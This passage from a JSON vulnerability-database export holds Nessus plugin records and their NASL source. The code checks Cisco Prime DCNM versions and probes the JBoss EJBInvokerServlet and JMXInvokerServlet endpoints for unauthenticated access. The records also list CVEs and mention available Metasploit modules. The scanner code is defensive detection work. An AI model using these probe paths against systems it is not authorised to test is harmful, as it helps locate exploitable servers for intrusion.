6.1.x\n (major == '6.1' && build !~ '^1([^0-9]|$)') # 6.1.x < 6.1(2)\n) audit(AUDIT_WEB_APP_NOT_AFFECTED, appname, url, ver);\n\nif (report_verbosity > 0)\n{\n report =\n '\\n URL : ' + url +\n '\\n Installed version : ' + ver +\n '\\n Fixed version : 6.1(2)\\n';\n security_hole(port:port, extra:report);\n}\nelse security_hole(port);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T01:33:43", "description": "According to its self-reported version number, the version of Cisco\nPrime Data Center Network Manager (DCNM) installed on the remote host\nis affected by a remote code execution vulnerability. Unauthorized\nusers have access to the JBoss Application Server Remote Method\nInvocation services. A remote, unauthenticated attacker could exploit\nthis to execute arbitrary code as SYSTEM (on Windows) or root (on\nLinux).", "edition": 28, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2013-07-11T00:00:00", "title": "Cisco Prime Data Center Network Manager RMI Remote Code Execution (credentialed check)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-1036", "CVE-2012-5417"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:cisco:prime_data_center_network_manager"], "id": "CISCO_PRIME_DCNM_6_1_2_LOCAL.NASL", "href": "https://www.tenable.com/plugins/nessus/67248", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(67248);\n script_version(\"1.13\");\n script_cvs_date(\"Date: 2018/11/15 20:50:22\");\n\n script_cve_id(\"CVE-2007-1036\", \"CVE-2012-5417\");\n script_bugtraq_id(56348);\n script_xref(name:\"CERT\", value:\"632656\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCtz44924\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCua31204\");\n script_xref(name:\"CISCO-SA\", value:\"cisco-sa-20121031-dcnm\");\n\n script_name(english:\"Cisco Prime Data Center Network Manager RMI Remote Code Execution (credentialed check)\");\n script_summary(english:\"Checks DCNM version number\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A network management system installed on the remote is affected by a\nremote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version number, the version of Cisco\nPrime Data Center Network Manager (DCNM) installed on the remote host\nis affected by a remote code execution vulnerability. Unauthorized\nusers have access to the JBoss Application Server Remote Method\nInvocation services. A remote, unauthenticated attacker could exploit\nthis to execute arbitrary code as SYSTEM (on Windows) or root (on\nLinux).\");\n # https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20121031-dcnm\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?2ef95f6c\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to Cisco Prime Data Center Network Manager 6.1(2) or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploithub_sku\", value:\"EH-12-667\");\n script_set_attribute(attribute:\"exploit_framework_exploithub\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'JBoss JMX Console Deployer Upload and Execute');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_cwe_id(264);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2007/02/20\"); \n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/12/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:cisco:prime_data_center_network_manager\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Gain a shell remotely\");\n\n script_copyright(english:\"This script is Copyright (C) 2013-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"cisco_prime_dcnm_installed_win.nasl\", \"cisco_prime_dcnm_installed_linux.nasl\");\n script_require_ports(\"installed_sw/Cisco Prime DCNM\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"install_func.inc\");\n\nappname = \"Cisco Prime DCNM\";\n\nget_install_count(app_name:appname, exit_if_zero:TRUE);\ninstall = get_single_install(app_name:appname, exit_if_unknown_ver:TRUE);\n\nver = install['version'];\npath = install['path'];\ndisplay_ver = install['display_version'];\n\nfix = '6.1.2.0';\ndisplay_fix = '6.1(2)';\n\nif (ver_compare(ver:ver, fix:fix, strict:FALSE) >= 0)\n audit(AUDIT_INST_VER_NOT_VULN, appname, display_ver);\n\n# Could be Windows or *nix\nport = get_kb_item('SMB/transport');\nif (!port) port = 0;\n\nif (report_verbosity > 0)\n{\n if (isnull(display_ver))\n display_ver = ver;\n\n report =\n '\\n Path : ' + path +\n '\\n Installed version : ' + display_ver +\n '\\n Fixed version : ' + display_fix + '\\n';\n security_hole(port:port, extra:report);\n}\nelse security_hole(port);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-20T11:36:19", "description": "The 'EBJInvokerServlet' and 'JMXInvokerServlet' servlets hosted on\nthe web server on the remote host are accessible to unauthenticated\nusers. The remote host is, therefore, affected by the following\nvulnerabilities :\n\n - A security bypass vulnerability exists due to improper\n restriction of access to the console and web management\n interfaces. An unauthenticated, remote attacker can\n exploit this, via direct requests, to bypass\n authentication and gain administrative access.\n (CVE-2007-1036)\n\n - A remote code execution vulnerability exists due to the\n JMXInvokerHAServlet and EJBInvokerHAServlet invoker\n servlets not properly restricting access to profiles. An\n unauthenticated, remote attacker can exploit this to\n bypass authentication and invoke MBean methods,\n resulting in the execution of arbitrary code.\n (CVE-2012-0874)\n\n - A remote code execution vulnerability exists in the\n EJBInvokerServlet and JMXInvokerServlet servlets due to\n the ability to post a marshalled object. An\n unauthenticated, remote attacker can exploit this, via a\n specially crafted request, to install arbitrary\n applications. Note that this issue is known to affect\n McAfee Web Reporter versions prior to or equal to\n version 5.2.1 as well as Symantec Workspace Streaming\n version 7.5.0.493 and possibly earlier.\n (CVE-2013-4810)", "edition": 30, "published": "2013-10-14T00:00:00", "title": "Apache Tomcat / JBoss EJBInvokerServlet / JMXInvokerServlet Multiple Vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-4810", "CVE-2012-0874", "CVE-2007-1036"], "modified": "2013-10-14T00:00:00", "cpe": ["cpe:/a:jboss:jboss_application_server", "cpe:/a:hp:procurve_manager", "cpe:/a:symantec:workspace_streaming", "cpe:/a:hp:identity_driven_manager", "cpe:/a:redhat:jboss_enterprise_brms_platform", "cpe:/a:redhat:jboss_enterprise_web_platform", "cpe:/a:redhat:jboss_enterprise_application_platform", "cpe:/a:redhat:jboss_enterprise_application_platform", "cpe:/a:hp:application_lifecycle_management"], "id": "JMXINVOKERSERVLET_EJBINVOKERSERVLET_RCE.NASL", "href": "https://www.tenable.com/plugins/nessus/70414", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(70414);\n script_version(\"1.23\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2007-1036\", \"CVE-2012-0874\", \"CVE-2013-4810\");\n script_bugtraq_id(57552, 62854, 77037);\n script_xref(name:\"CERT\", value:\"632656\");\n script_xref(name:\"EDB-ID\", value:\"16318\");\n script_xref(name:\"EDB-ID\", value:\"21080\");\n script_xref(name:\"EDB-ID\", value:\"28713\");\n script_xref(name:\"EDB-ID\", value:\"30211\");\n script_xref(name:\"ZDI\", value:\"ZDI-13-229\");\n script_xref(name:\"HP\", value:\"HPSBGN02952\");\n script_xref(name:\"HP\", value:\"SSRT101127\");\n script_xref(name:\"HP\", value:\"emr_na-c04041110\");\n\n script_name(english:\"Apache Tomcat / JBoss EJBInvokerServlet / JMXInvokerServlet Multiple Vulnerabilities\");\n script_summary(english:\"Attempts to access the servlets without credentials.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The 'EBJInvokerServlet' and 'JMXInvokerServlet' servlets hosted on\nthe web server on the remote host are accessible to unauthenticated\nusers. The remote host is, therefore, affected by the following\nvulnerabilities :\n\n - A security bypass vulnerability exists due to improper\n restriction of access to the console and web management\n interfaces. An unauthenticated, remote attacker can\n exploit this, via direct requests, to bypass\n authentication and gain administrative access.\n (CVE-2007-1036)\n\n - A remote code execution vulnerability exists due to the\n JMXInvokerHAServlet and EJBInvokerHAServlet invoker\n servlets not properly restricting access to profiles. An\n unauthenticated, remote attacker can exploit this to\n bypass authentication and invoke MBean methods,\n resulting in the execution of arbitrary code.\n (CVE-2012-0874)\n\n - A remote code execution vulnerability exists in the\n EJBInvokerServlet and JMXInvokerServlet servlets due to\n the ability to post a marshalled object. An\n unauthenticated, remote attacker can exploit this, via a\n specially crafted request, to install arbitrary\n applications. Note that this issue is known to affect\n McAfee Web Reporter versions prior to or equal to\n version 5.2.1 as well as Symantec Workspace Streaming\n version 7.5.0.493 and possibly earlier.\n (CVE-2013-4810)\");\n # https://www.redteam-pentesting.de/publications/2009-11-30-Whitepaper_Whos-the-JBoss-now_RedTeam-Pentesting_EN.pdf\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?74979c27\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-13-229/\");\n # https://web.archive.org/web/20131031213751/http://retrogod.altervista.org/9sg_ejb.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?52567bc1\");\n script_set_attribute(attribute:\"see_also\", value:\"https://seclists.org/bugtraq/2013/Oct/126\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.securityfocus.com/archive/1/530241/30/0/threaded\");\n script_set_attribute(attribute:\"see_also\", value:\"https://seclists.org/bugtraq/2013/Dec/att-133/ESA-2013-094.txt\");\n script_set_attribute(attribute:\"solution\", value:\n\"If using EMC Data Protection Advisor, either upgrade to version 6.x or\napply the workaround for 5.x. \n\nOtherwise, contact the vendor or remove any affected JBoss servlets.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:U/RC:ND\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'JBoss JMX Console Deployer Upload and Execute');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_exploithub\", value:\"true\");\n script_set_attribute(attribute:\"exploithub_sku\", value:\"EH-13-606\");\n script_cwe_id(264);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/09/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/10/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:hp:procurve_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:hp:application_lifecycle_management\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:hp:identity_driven_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:redhat:jboss_enterprise_web_platform\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:redhat:jboss_enterprise_application_platform\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:redhat:jboss_enterprise_brms_platform\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:redhat:jboss_enterprise_application_platform\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:jboss:jboss_application_server\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:symantec:workspace_streaming\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"http_version.nasl\");\n script_require_ports(\"Services/www\", 9111, 8080, 9832);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\n\n# Identify possible ports.\n#\n# - web servers.\nports = get_kb_list(\"Services/www\");\nif (isnull(ports)) ports = make_list();\n\n# - ports for McAfee Web Reporter and Symantec Workspace Streaming.\nforeach p (make_list(8080, 9111, 9832))\n{\n if (service_is_unknown(port:p)) ports = add_port_in_list(list:ports, port:p);\n}\n\n# Check each port.\nnon_vuln = make_list();\n\nforeach port (ports)\n{\n vuln_urls = make_list();\n\n foreach page (make_list(\"/EJBInvokerServlet\", \"/JMXInvokerServlet\"))\n {\n url = \"/invoker\" + page;\n res = http_send_recv3(\n method : \"GET\",\n item : url,\n port : port,\n fetch404 : TRUE\n );\n\n if (\n !isnull(res) &&\n \"org.jboss.invocation.MarshalledValue\" >< res[2] &&\n (\n 'WWW-Authenticate: Basic realm=\"JBoss HTTP Invoker\"' >!< res[1] ||\n \"404 Not Found\" >!< res[1]\n )\n ) vuln_urls = make_list(vuln_urls, build_url(qs:url, port:port));\n }\n\n if (max_index(vuln_urls) > 0)\n {\n if (max_index(vuln_urls) > 1) request = \"URLs\";\n else request = \"URL\";\n\n if (report_verbosity > 0)\n {\n report =\n '\\n' +'Nessus was able to verify the issue exists using the following '+\n '\\n' + request + ' :' +\n '\\n' +\n '\\n' + join(vuln_urls, sep:'\\n') + '\\n';\n\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n }\n else non_vuln = make_list(non_vuln, port);\n}\n\nif (max_index(non_vuln) == 1) exit(0, \"The web server tested on port \" + port + \" is not affected.\");\nelse if (max_index(non_vuln) > 1) exit(0, \"None of the ports tested (\" +join(non_vuln, sep:\", \")+ \") contain web servers that are affected.\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "securityvulns": [{"lastseen": "2018-08-31T11:09:23", "bulletinFamily": "software", "cvelist": ["CVE-2007-1156", "CVE-2007-1036", "CVE-2007-1157"], "description": "Web console and management instruments are available without authentication.", "edition": 1, "modified": "2007-02-23T00:00:00", "published": "2007-02-23T00:00:00", "id": "SECURITYVULNS:VULN:7280", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:7280", "title": "JBoss insecure defaults", "type": "securityvulns", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}